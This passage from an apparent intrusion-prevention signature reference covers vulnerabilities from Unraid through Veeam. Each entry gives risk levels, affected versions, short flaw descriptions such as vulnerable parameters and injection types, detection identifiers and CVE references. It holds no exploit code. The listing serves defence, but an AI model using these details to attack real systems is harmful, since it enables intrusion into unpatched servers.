Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Insecure Configuration
Description: HTML script tags may be used to run non-standard client side languages and to bypass origin policy protections.
Back to top

Unraid-Auth-Bypass-PHP-RCE

About this vulnerability: A vulnerability in Unraid
Risk: High
First detected in: sgpkg-ips-1291-5242
Last changed: sgpkg-ips-1408-5242
Platform: Generic
Software: Unraid
Type: Input Validation
Description: There exists a vulnerability in Unraid, version 6.8.0, which allows remote attackers to execute arbitrary code due to insufficient user input validation. This situation also covers the vulnerability CVE-2020-5849.
Situation: HTTP_CRL-Unraid-Auth-Bypass-PHP-RCE
References:
CVE-2020-5847
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5847
Back to top

UnrealIRCD-Backdoor-Command-Execution

About this vulnerability: A UnrealIRCD Backdoor Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: UnrealIRCD
Type: Backdoor
Description: An externally introduced backdoor in UnrealIRCD version 3.2.8.1, distributed from November 2009 through June 2010, allows remote attackers to execute arbitrary commands.
Situation: Generic_CS-UnrealIRCD-Backdoor-Command-Execution
References:
CVE-2010-2075
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2075
BID-40820
http://www.securityfocus.com/bid/40820
OSVDB-65445
http://www.osvdb.org/65445
Back to top

Untangle-NG-Firewall-execEvil-Command-Injection

About this vulnerability: A vulnerability in Untangle
Risk: Moderate
First detected in: sgpkg-ips-816-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Untangle
Type: Malfunction
Description: A command injection vulnerability in the Untangle firewall can be used to run arbitrary commands on the target system.
Situation: HTTP_CRL-Untangle-NG-Firewall-execEvil-Command-Injection
Back to top

Unusual-IP-Address-Format-Used-In-HTTP-Request

About this vulnerability: An unsual IP address format used in HTTP request
Risk: Low
First detected in: sgpkg-ips-94-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic HTTP client
Type: Metacharacter
Description: An IP address can be specified in numeric format, usually four decimal numbers separated by dots. The HTTP protocol also supports the use of other rarely used ways to specify the address, for example using octal or hexadecimal numbers. This kind of addressing is sometimes used by malware to conceal activity from the end user.
Situation: HTTP_CSH-Unusual-IP-Address-Format-Used-In-HTTP-Request
Back to top

Unzip-Extra-Field-Uncompressed-Size-Buffer-Overflow

About this vulnerability: A vulnerability in Info-ZIP UnZip
Risk: High
First detected in: sgpkg-ips-637-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Info-ZIP UnZip
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Info-ZIP UnZip tool. The vulnerability is due to insufficient bounds checking on user-supplied input while handling ZIP files. Specifically, a crafted ZIP archive containing uncompressed size in extra fields that are smaller than the corresponding compressed data sizes in the archive file will trigger a heap buffer overflow. A remote unauthenticated attacker can exploit these vulnerabilities by enticing a target user to open a crafted ZIP archive with the "-t" option. Successful exploitation would crash the program, resulting in a denial of service condition or possibly arbitrary code execution.
Situation: File-Zip_Unzip-Extra-Field-Uncompressed-Size-Buffer-Overflow
References:
CVE-2014-9636
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9636
BID-71825
http://www.securityfocus.com/bid/71825
OSVDB-114423
http://www.osvdb.org/114423
Back to top

UPnP-IGD-Apple-Mac-OSX-mDNSResponder-Compromise

About this vulnerability: A code execution vulnerability in Apple Mac OS X mDNSResponder
Risk: Moderate
First detected in: sgpkg-ips-150-2032
Last changed: sgpkg-ips-1296-5242
Platform: Mac OS X
Software: <os>
Type: Buffer Overflow
Description: mDNSResponder in Apple Mac OS X suffers from a buffer overflow vulnerability related to parsing crafted UPnP IGD packets. Remote attackers can use the vulnerability to execute arbitrary code on the vulnerable system.
Situation: Generic_UDP-UPnP-IGD-Apple-Mac-OSX-mDNSResponder-Compromise
References:
CVE-2007-2386
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2386
BID-24144
http://www.securityfocus.com/bid/24144
OSVDB-35142
http://www.osvdb.org/35142
Back to top

UPX-Packed-ELF-Executable

About this vulnerability: A suspicious executable file was detected
Risk: Moderate
First detected in: sgpkg-ips-1221-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Backdoor
Description: An executable file which has been packed with the UPX packer was detected. Software packers are usually used for compressing the contents of an executable to make them smaller. Some malware have been found to use the UPX packer to evade anti-malware software.
Situation: File-Binary_UPX-Packed-ELF-Executable
Back to top

UPX-Packed-Executable

About this vulnerability: A suspicious executable file was detected
Risk: Moderate
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: An executable file which has been packed with the UPX packer was detected. Software packers are usually used for compressing the contents of an executable to make them smaller. Some malware have been found to use the UPX packer to evade anti-malware software.
Situation: File-Exe_UPX-Packed-Executable
Back to top

Use-After-Free-Vulnerability-In-Smb-Kernel-Server-Ksmbd-ZDI-22-1690

About this vulnerability: An attempt to exploit a vulnerability in ksmbd detected
Risk: High
First detected in: sgpkg-ips-1541-5242
Last changed: sgpkg-ips-1542-5242
Platform: Linux
Software: ksmbd
Type: Use-after-free
Description: The flaw exists within the processing of SMB2_TREE_DISCONNECT commands in SMB Kernel Server ksmbd. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the kernel.
Situation: SMB-TCP_Use-After-Free-Vulnerability-In-Smb-Kernel-Server-Ksmbd-ZDI-22-1690
References:
CVE-2022-47939
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-47939
Back to top

Ustorekeeper-Cgi-File-Disclosure

About this vulnerability: ustorekeeper.pl arbitrary file disclosure
Risk: Moderate
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: uStorekeeper
Type: Directory Traversal
Description: uStorekeeper.pl has a directory traversal vulnerability. This allows a remote user to read arbitrary files from the server.
References:
CVE-2001-0466
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0466
Back to top

uTorrent-Announce-Url-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in uTorrent
Risk: High
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-1555-5242
Platform: Windows
Software: uTorrent
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in uTorrent. By persuading a target user to open a crafted torrent file that has an excessivley long announce URL with a vulnerable application, a remote attacker can compromise the user's system.
Situation: HTTP_SS-uTorrent-Announce-Url-Buffer-Overflow
References:
CVE-2007-0927
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0927
BID-22530
http://www.securityfocus.com/bid/22530
OSVDB-33180
http://www.osvdb.org/33180
Back to top

UUSee-Streaming-Media

About this vulnerability: UUSee streaming media client
Risk: Low
First detected in: sgpkg-ips-183-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: UUSee
Type: Streaming Media
Description: UUSee is a streaming media client.
Situation: HTTP_CSH-UUSee-Activity
Back to top

V-CMS-PHP-File-Upload-And-Execute-Vulnerability

About this vulnerability: An attempt to exploit a vulnerability in V-CMS 1.0 PHP File Upload detected
Risk: High
First detected in: sgpkg-ips-655-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: V-CMS PHP
Type: Input Validation
Description: A vulnerability in the V-CMS 1.0 PHP inline image upload feature which allows remote attackers to upload and execute any arbitrary script and execute it with a GET request, due to a failure of inline_image_upload.php to check the file type.
Situation: HTTP_CS-V-CMS-PHP-File-Upload-And-Execute-Vulnerability
References:
CVE-2011-4828
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4828
BID-50706
http://www.securityfocus.com/bid/50706
OSVDB-77183
http://www.osvdb.org/77183
Back to top

Valmet-DNA-Predictable-Key-Remote-Code-Execution

About this vulnerability: Remote code execution vulnerability in Valmet DNA
Risk: Moderate
First detected in: sgpkg-ips-1520-5242
Last changed: sgpkg-ips-1520-5242
Platform: Generic
Software: <os>
Type: Insecure Configuration
Description: There is a remote code execution vulnerability in the Valmet DNA service running in port TCP/1517. Using a predictable encryption key, an attacker can trigger commands that will be executed on the remote machine with the SYSTEM privileges.
Situation: Generic_CS-Valmet-DNA-Predictable-Key-Usage
References:
CVE-2021-26726
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26726
Back to top

Valve-Steam-Usage

About this vulnerability: Valve Steam protocol usage
Risk: Low
First detected in: sgpkg-ips-206-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Valve Steam
Type: Online Game
Description: Steam is a online gaming protocol developed by Valve and it is included in various games such as Half Life 2. It is used to control registration and upgrades of the installed games as well as to provide additional services such as instant messaging.
Situation: Generic_UDP-Valve-Steam-Usage
HTTP_CSH-Valve-Steam-Usage
Back to top

Vandyke-AbsoluteFTP-Buffer-Overflow

About this vulnerability: A Vandyke AbsoluteFTP Buffer Overflow vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: VanDyke AbsoluteFTP
Type: Buffer Overflow
Description: A buffer overflow vulnerability in VanDyke AbsoluteFTP, versions 1.9.6 through 2.2.10, which allows remote attackers to execute arbitrary code via a crafted file name in a LIST command response.
Situation: FTP_SS-Vandyke-AbsoluteFTP-Buffer-Overflow
References:
CVE-2011-5164
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5164
BID-50614
http://www.securityfocus.com/bid/50614
OSVDB-77105
http://www.osvdb.org/77105
Back to top

Vandyke-Securecrt-Configuration-Folder-Vulnerability

About this vulnerability: A vulnerability in VanDyke Software SecureCRT
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: VanDyke SecureCRT
Type: Input Validation
Description: There is a vulnerability in the way VanDyke SecureCRT handles telnet URLs. Through the use of a telnet URL, SecureCRT can be remotely supplied a parameter which can be used to specify an arbitrary configuration folder; this configuration folder can reside on a remote shared resource. Because a configuration file can reference script code, an attacker can exploit this vulnerability to execute code on the vulnerable system in the context of the currently logged in user. In an attack case, the vulnerable application will start unexpectedly and attempt to establish a telnet session with a remote server. Any malicious script code referenced by the non-default configuration folder will be executed in the background without any warnings or user interaction. Further behaviour of the attack target is entirely dependent on the nature of the executed code. The code is executed in the security context of the currently logged in user.
Situation: File-Text_Vandyke-Securecrt-Configuration-Folder-Vulnerability
References:
CVE-2004-1541
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1541
BID-11731
http://www.securityfocus.com/bid/11731
Back to top

Vandyke-Securecrt-SSH-Client-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Van Dyke SecureCRT SSH Client.
Risk: High
First detected in: sgpkg-ips-663-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: VanDyke SecureCRT
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Van Dyke SecureCRT SSH Client, before 3.4.6 and 4.x before 4.0 beta 3, which allows remote attackers to execute arbitrary code via a long SSH1 protocol version string.
Situation: SSH_Vandyke-Securecrt-SSH-Client-Buffer-Overflow
References:
CVE-2002-1059
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1059
BID-5287
http://www.securityfocus.com/bid/5287
OSVDB-4991
http://www.osvdb.org/4991
Back to top

Vandyke-Vshell-Server-Trigger-Command-Injection

About this vulnerability: A vulnerability in VanDyke VShell
Risk: High
First detected in: sgpkg-ips-1479-5242
Last changed: sgpkg-ips-1479-5242
Platform: Generic
Software: VanDyke VShell
Type: Input Validation
Description: A command injection vulnerability has been reported in VanDyke VShell Server. The vulnerability is caused by insufficient sanitization of input passed to trigger action commands. A remote attacker can exploit this vulnerability by sending crafted traffic to the target server. Successful exploitation could result in command injection.
Situation: FTP_CS-Vandyke-Vshell-Server-Trigger-Command-Injection
HTTP_CRL-Vandyke-Vshell-Server-Trigger-Command-Injection
References:
CVE-2022-28054
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28054
Back to top

Varnish-Cache-HTTP2-Flow-Control-Denial-Of-Service

About this vulnerability: An attempt to exploit a vulnerability in Varnish Cache detected
Risk: High
First detected in: sgpkg-ips-1733-5242
Last changed: sgpkg-ips-1762-5242
Platform: Linux; Unix
Software: Varnish Cache
Type: Resource Starvation
Description: A vulnerability in Varnish Cache, versions 6.0.x LTS before 6.0.13, 7.3.x before 7.3.2, 7.4.x before 7.4.3, Enterprise 6.0.x up to 6.0.12r5, which allows remote attackers to cause a denial of service condition by sending crafted requests to the target server, due to improper handling of HTTP/2 connections flow control.
Situation: HTTP2_SETTINGS-Varnish-Cache-HTTP2-Flow-Control-Denial-Of-Service
HTTP_CSH-Varnish-Cache-HTTP2-Flow-Control-Denial-Of-Service
References:
CVE-2024-30156
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-30156
Back to top

Vawtrak-Botnet

About this vulnerability: Vawtrak botnet
Risk: High
First detected in: sgpkg-ips-650-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Code Injection
Description: Vawtrak is a malicious botnet which poses a serious threat to Internet users. Most notably, Vawtrak engages in trojan activity as an information stealer and a tool to commit banking fraud. In addition, it may download further malicious modules. Users of infected computers are advised to disinfect their computers and change passwords for online banking and other online services immediately.
Situation: HTTP_CSH-Vawtrak-Botnet-Traffic
File-Text_Vawtrak-Botnet-Traffic
Back to top

VBScript-File-Transfer

About this vulnerability: A transfer of a VBScript file detected
Risk: High
First detected in: sgpkg-ips-1857-5242
Last changed: sgpkg-ips-1857-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: VBScript has been commonly used by malicious actors to distribute malware onto victims' computers. Thus, by blocking VBScript files, we effectively reduce one malware infection vector.
Situation: File-Member-Name_VBScript-File-Transfer
File-Name_VBScript-File-Transfer
Back to top

VBScript-In-Insecure-Frameworks

About this vulnerability: VBScript script use in insecure web frameworks
Risk: Moderate
First detected in: sgpkg-ips-892-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Insecure Configuration
Description: VBscript use in the open web is near obsolete these days. Most of the utilization happens within legacy Intranet apps and for providing script functions for legacy browsers. Yet VBScript is very commonly used as an attack vector on the Internet. These situations can detect vbscript usage in some most commonly exploited web applications targeted by known exploit kits.
Situation: File-Text_VBScript-In-Bo-Bbs
File-Text_VBScript-In-Wordpress
Back to top

VBScript-Scripting-Detected

About this vulnerability: VBScript scripting used
Risk: Moderate
First detected in: sgpkg-ips-470-5211
Last changed: sgpkg-ips-1771-5242
Platform: Windows
Software: Internet Explorer
Type: Insecure Configuration
Description: VBScript scripting used
Situation: File-Text_Outdated-Browser-VBScript-Scripting-Detected
File-Text_Reverse-Obfuscated-Script
File-Text_Obfuscated-VBScript-Detected
File-Text_Obfuscated-VBScript-Char-Execute-Detected
File-Text_Obfuscated-VBScript-Shell-Detected
File-Text_VBScript-Scripting-Detected
Back to top

VBScript_Engine_Use_After_Free_Vulnerability_CVE-2019-1485

About this vulnerability: A vulnerability in VBScript Engine
Risk: High
First detected in: sgpkg-ips-1209-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0
Type: Use-after-free
Description: There exists a use after free vulnerability in VBScript Engine. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_VBScript_Engine_Use_After_Free_Vulnerability_CVE-2019-1485
References:
CVE-2019-1485
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1485
ms19-dec
http://technet.microsoft.com/security/bulletin/ms19-dec
Back to top

vBSEO-Remote-PHP-Code-Injection

About this vulnerability: A vBSEO Remote PHP Code Injection vulnerability.
Risk: High
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1720-5242
Platform: Generic
Software: vBSEO
Type: Input Validation
Description: A vulnerability in vBSEO, versions 3.6.0 and before, that allows remote attackers to execute arbitrary PHP code via the char_repl parameter, using complex curly syntax, to a POST method.
Situation: File-Text_vBSEO-Remote-PHP-Code-Injection
References:
CVE-2012-5223
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5223
BID-51647
http://www.securityfocus.com/bid/51647
OSVDB-78508
http://www.osvdb.org/78508
Back to top

VBulletin-Arbitrary-Code-Execution

About this vulnerability: A VBulletin Arbitrary Code Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-734-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: vBulletin
Type: Buffer Overflow
Description: A buffer overflow vulnerability in vBulletin, versions 3.0.6 and earlier, which allows remote attackers to execute arbitrary PHP code via nested variables in the template parameter.
Situation: Generic_MySQL-MaxDB-WebDBM-BOF
References:
CVE-2005-0511
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0511
BID-12622
http://www.securityfocus.com/bid/12622
OSVDB-14047
http://www.osvdb.org/14047
Back to top

VBulletin-Formudisplay-Php-Script-Execution

About this vulnerability: Script execution vulnerability in vBulletin Forumdisplay.php
Risk: Moderate
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: vBulletin
Type: Malfunction
Description: The PHP-based vBulletin Web forum contains a code execution flaw in the forumdisplay.php script. A remote attacker could execute arbitrary commands on the vulnerable server via the comma parameter. Several preconditions exist for the vulnerability, which makes it harder to exploit.
Situation: HTTP_CSU-VBulletin-Forumdisplay-Php-Script-Execution
References:
CVE-2005-0429
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0429
BID-12542
http://www.securityfocus.com/bid/12542
Back to top

VBulletin-nodeid-SQL-Injection

About this vulnerability: A VBulletin nodeid SQL Injection vulnerability
Risk: High
First detected in: sgpkg-ips-781-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: vBulletin
Type: SQL Injection
Description: A vulnerability in vBulletin, vesions 5.0.0 Beta 11 through 5.0.0 Beta 28, which allows remote attackers to extract the web application's usernames and hashes and authenticate to the vBulletin admin control panel.
Situation: HTTP_CRL-VBulletin-nodeid-SQL-Injection
References:
CVE-2013-3522
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3522
BID-58754
http://www.securityfocus.com/bid/58754
OSVDB-92031
http://www.osvdb.org/92031
Back to top

VBulletin-nodeid-SQL-Injection-CVE-2020-12720

About this vulnerability: A vulnerability in VBulletin
Risk: High
First detected in: sgpkg-ips-1252-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: vBulletin
Type: Malfunction
Description: There exists an SQL injection vulnerability in vBulletin software. Successful exploitation allows remote attackers to extract the admin user's token to access the vBulletin control panel.
Situation: HTTP_CRL-VBulletin-nodeid-SQL-Injection-CVE-2020-12720
References:
CVE-2020-12720
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12720
Back to top

VBulletin-PHP-Object-Injection

About this vulnerability: A VBulletin PHP Object Injection vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: vBulletin
Type: PHP Injection
Description: A vulnerability in vBulletin, versions 5.1.2 - 5.1.9, which allows remote attackers to perform a PHP object injection and execute arbitrary PHP code via a crafted serialized object inf the argument parameter to /decodeArguments.
Situation: HTTP_CSU-VBulletin-PHP-Object-Injection
References:
CVE-2015-7808
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7808
Back to top

VBulletin-Remote-Code-Execution-5.6.x

About this vulnerability: A vulnerability in vBulletin
Risk: High
First detected in: sgpkg-ips-1270-5242
Last changed: sgpkg-ips-1341-5242
Platform: Generic
Software: vBulletin
Type: Malfunction
Description: There exists a pre-auth remote code execution vulnerability in the versions 5.6.0, 5.6.1 and 5.6.2 of vBulletin forum software. Successful exploitation leads in arbitrary code execution.
Situation: HTTP_CRL-VBulletin-Remote-Code-Execution-5.6.x
References:
CVE-2020-17496
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17496
Back to top

VBulletin-Remote-Code-Execution-CVE-2019-16759

About this vulnerability: A vulnerability in vBulletin
Risk: High
First detected in: sgpkg-ips-1193-5242
Last changed: sgpkg-ips-1652-5242
Platform: Linux
Software: vBulletin
Type: Malfunction
Description: There exists a pre-auth remote code execution vulnerability in vBulletin software. Successful exploitation leads in arbitrary code execution.
References:
CVE-2019-16759
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16759
Back to top

VBulletin-Routestring-Unauthenticated-Remote-Code-Execution

About this vulnerability: An Unauthenticated Remote Code Execution vulnerability in VBulletin.
Risk: Moderate
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: vBulletin
Type: Directory Traversal
Description: There has been reported a vulnerability in vBulletin version 5, which allows remote attackers to execute arbitrary PHP code via a routestring parameter.
Situation: HTTP_CSU-VBulletin-Routestring-Unauthenticated-Remote-Code-Execution
Back to top

VBulletin-widgetConfig-RCE

About this vulnerability: A vulnerability in vBulletin
Risk: High
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows; Unix
Software: vBulletin
Type: Code Injection
Description: There exists a vulnerability in vBulletin, versions 5.x through 5.5.4, which allows remote attackers to execute arbitrary code due to unsufficient sanitization of the widgetConfig parameter in an ajax/render/widget_php routestring POST request.
Situation: HTTP_CRL-VBulletin-widgetConfig-RCE
References:
CVE-2019-16759
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16759
Back to top

Vcenter-Server-Arbitrary-File-Upload-CVE-2021-22005

About this vulnerability: An attempt to exploit a vulnerability in vCenter Server detected
Risk: High
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1391-5242
Platform: Generic
Software: VMware vCenter Server
Type: Malfunction
Description: An attempt to exploit a vulnerability in vCenter Server Arbitrary File Upload CVE-2021-22005 detected.
Situation: HTTP_CRL-Vcenter-Server-Arbitrary-File-Upload-CVE-2021-22005
References:
CVE-2021-22005
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22005
Back to top

Vcenter-Server-VSAN-Health-Check-RCE-CVE-2021-21985

About this vulnerability: An attempt to exploit a vulnerability in vCenter Server detected
Risk: High
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1391-5242
Platform: Generic
Software: VMware vCenter Server
Type: Malfunction
Description: An attempt to exploit a vulnerability in vCenter Server VSAN Health Check RCE CVE-2021-21985 detected.
Situation: HTTP_CRL-Vcenter-Server-VSAN-Health-Check-RCE-CVE-2021-21985
References:
CVE-2021-21985
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21985
Back to top

Veeam-Backup-And-Replication-Authentication-Bypass-CVE-2022-26501

About this vulnerability: A vulnerability in Veeam Backup and Replication
Risk: High
First detected in: sgpkg-ips-1460-5242
Last changed: sgpkg-ips-1460-5242
Platform: Generic
Software: Veeam Backup and Replication
Type: Malfunction
Description: An authentication bypass vulnerability has been reported in Veeam Backup and Replication. The vulnerability is due to lack of authorization when accessing an internal API service. A remote, unauthenticated attacker could exploit this vulnerability by authenticating to the target service with an NTLM anonymous session. Successful exploitation could lead to remote code execution on the target server.
Situation: Generic_CS-Veeam-Backup-And-Replication-Authentication-Bypass-CVE-2022-26501
References:
CVE-2022-26501
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26501
Back to top

Veeam-Backup-And-Replication-CDbCryptoKeyInfo-Insecure-Deserialization

About this vulnerability: An attempt to exploit a vulnerability in Veeam Backup and Replication detected
Risk: High
First detected in: sgpkg-ips-1855-5242
Last changed: sgpkg-ips-1855-5242
Platform: Generic
Software: Veeam Backup and Replication
Type: Input Validation
Description: Multiple insecure deserialization vulnerabilities have been reported in Veeam Backup and Replication (e.g., CVE-2024-40711, CVE-2024-42455, and CVE-2025-23120). One of their exploit vectors is through the "Veeam.Backup.Model.CDbCryptoKeyInfo" class. This fingerprint aims to detect such exploits.
Situation: Generic_CS-Veeam-Backup-And-Replication-CDbCryptoKeyInfo-Insecure-Deserialization
Back to top

Veeam-Backup-And-Replication-Cproxybinaryformatter-Arbitrary-File-Deletion

About this vulnerability: A vulnerability in Veeam Backup and Replication
Risk: Moderate
First detected in: sgpkg-ips-1821-5242
Last changed: sgpkg-ips-1821-5242
Platform: Generic
Software: Veeam Backup and Replication
Type: Input Validation
Description: Improper validation of user-submitted serialized objects causes a file deletion vulnerability in Veeam. A successful exploitation allows an attacker to remotely delete arbitrary files on the target system.
Situation: Generic_CS-Veeam-Backup-And-Replication-Cproxybinaryformatter-Arbitrary-File-Deletion
References:
CVE-2024-42455
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42455
Back to top

Veeam-Backup-And-Replication-Credential-Disclosure-CVE-2023-27532

About this vulnerability: A vulnerability in Veeam Backup and Replication
Risk: High
First detected in: sgpkg-ips-1571-5242
Last changed: sgpkg-ips-1571-5242
Platform: Generic
Software: Veeam Backup and Replication
Type: Insecure Configuration
Description: A credential disclosure vulnerability has been reported in Veeam Backup and Replication. The vulnerability is due to lack of authorization when accessing a remote Windows Communication Foundation service. Successful exploitation could allow an unauthenticated attacker to retrieve unencrypted credentials from the target server and possibly execute arbitrary code.
Situation: Generic_CS-Veeam-Backup-And-Replication-Credential-Disclosure-CVE-2023-27532
References:
CVE-2023-27532
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27532
Back to top

Veeam-Backup-And-Replication-FindValidSTSEndpointUrl-Authentication-Bypass

About this vulnerability: An attempt to exploit a vulnerability in Veeam Backup Enterprise Manager detected
Risk: High
First detected in: sgpkg-ips-1737-5242
Last changed: sgpkg-ips-1737-5242
Platform: Generic
Software: Veeam Backup and Replication
Type: Insecure Configuration
Description: A vulnerability in Veeam Backup Enterprise Manager, Veeam Backup and Replication 12.1 prior to 12.1.2.172, which allows remote attackers to bypass authentication by sending crafted requests to the target server, due to mishandling of user supplied data.
Situation: HTTP_CRL-Veeam-Backup-And-Replication-FindValidSTSEndpointUrl-Authentication-Bypass
References:
CVE-2024-29849
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29849
Back to top

Veeam-Backup-And-Replication-Insecure-Deserialization-CVE-2024-40711

About this vulnerability: A vulnerability in Veeam Backup and Replication
Risk: Critical
First detected in: sgpkg-ips-1784-5242
Last changed: sgpkg-ips-1784-5242
Platform: Generic
Software: Veeam Backup and Replication
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in Veeam Backup and Replication. The vulnerability is due to improper validation of user submitted serialized objects in the Deserialize method of CProxyBinaryFormatter class. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code execution under the security context of SYSTEM.
Situation: Generic_CS-Veeam-Backup-And-Replication-Insecure-Deserialization-CVE-2024-40711
References:
CVE-2024-40711
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-40711
Back to top

Veeam-Backup-And-Replication-Insecure-Deserialization-CVE-2025-23120

About this vulnerability: A vulnerability in Veeam Backup and Replication
Risk: Critical
First detected in: sgpkg-ips-1853-5242
Last changed: sgpkg-ips-1853-5242
Platform: Generic
Software: Veeam Backup and Replication
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in Veeam Backup and Replication. The vulnerability is due to improper validation of user submitted serialized objects in the Deserialize method of CProxyBinaryFormatter class. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary code execution under the security context of SYSTEM.
Situation: Generic_CS-Veeam-Backup-And-Replication-Insecure-Deserialization-CVE-2025-23120
References:
CVE-2025-23120
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-23120
Back to top

Veeam-One-Agent-Deserialization

About this vulnerability: A vulnerability in Veeam ONE.
Risk: High
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Platform: Windows
Software: Veeam ONE
Type: Input Validation
Description: A vulnerability in Veeam ONE, versions before hotfix 9.5.5.4587, and 10.0.1.750 in the 9 and 10 release lines, which allows remote attackers to execute arbitrary commands by forcing the agent to deserialize untrusted data by a failure in the handshake method.
Situation: Generic_CS-Veeam-One-Agent-Deserialization
References:
CVE-2020-10914
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10914
Back to top

Veeam-One-Reporter-importlicense-Page_Load-XML-External-Entity-Injection

About this vulnerability: A vulnerability in Veeam ONE
Risk: Moderate
First detected in: sgpkg-ips-1270-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Veeam ONE
Type: Input Validation
Description: There exists an XML external entity injection vulnerability in Veeam ONE. Successful exploitation could lead in disclosure of files of the target system.
Situation: HTTP_CRL-Veeam-One-Reporter-importlicense-Page_Load-XML-External-Entity-Injection
References:
CVE-2020-15419
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15419
Back to top

Veeam-One-Ssrsreport-Getcustomelementtext-Xml-External-Entity-Injection

About this vulnerability: A vulnerability in Veeam ONE
Risk: High
First detected in: sgpkg-ips-1286-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Veeam ONE
Type: Input Validation
Description: An XML external entity injection vulnerability exists in Veeam ONE. The vulnerability is due to insufficient handling of XML external entities in requests submitted to the server. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted request to the target server. Successful exploitation will result in disclosure of arbitrary file contents in the security context of SYSTEM.
Situation: HTTP_CRL-Veeam-One-Ssrsreport-Getcustomelementtext-Xml-External-Entity-Injection
References:
CVE-2020-15418
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15418
Back to top

Veertu-Anka-Build-Service-Directory-Traversal

